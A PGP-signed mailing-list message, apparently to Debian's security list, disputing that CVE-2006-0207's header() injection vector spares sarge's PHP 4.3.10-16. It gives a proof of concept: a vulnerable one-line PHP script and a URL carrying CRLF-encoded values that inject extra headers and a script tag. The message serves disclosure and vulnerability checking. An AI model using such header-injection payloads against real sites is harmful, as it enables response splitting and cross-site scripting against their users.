-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi!
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=354683;msg=19 and http://idssi.enyo.de/tracker/CVE-2006-0207 claim CVE-2006-0207 would not apply to sarges' 4.3.10-16. However, it does apply. The false assumption that the advisory by Stefan Esser (Hardened PHP) at http://www.hardened-php.net/advisory_012006.112.html would cover both vectors of CVE-2006-0207, has likely led to an incorrect conclusion of assuming that CVE-2006-0207 would not affect sarge. However, by my understanding, this advisory only covers the session injection vector (vector 1 as mentioned in CVE-2006-0207), not the header() injection issue (vector 2 as mentioned in CVE-2006-0207) which affects upstream PHP4 < 4.4.2 and PHP5 < 5.1.2, and also affects sarges' 4.3.10-16. PoC: echo '<?php header("Location: http://example.org/".$_GET["x";]); ?>' \ > /var/www/header.php Then direct your web browser to http://MYDEFAULTHOST/header.php?x=%0d%0aLocation:%20javascript:alert(0);%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Cscript%3Ealert(0);%3C/script%3EVulnerable%20PHP%20version%20detected.%3C!-- (obviously, replace MYDEFAULTHOST by whatever (virtual)host you can access this script through). If vulnerable, this should return one or two javascript warnings saying '0' or a client (not PHP!) error with most HTTP clients. You should also see a page saying "Vulnerable PHP version detected." if you're vulnerable. Moritz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFE4RDHn6GkvSd/BgwRAkqpAKCVi+1XydxeVv9JIEHz7SHVz2bDwQCdFx90 t2YSPZOcP4PKl8g057KJGcU= =exFc -----END PGP SIGNATURE----- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
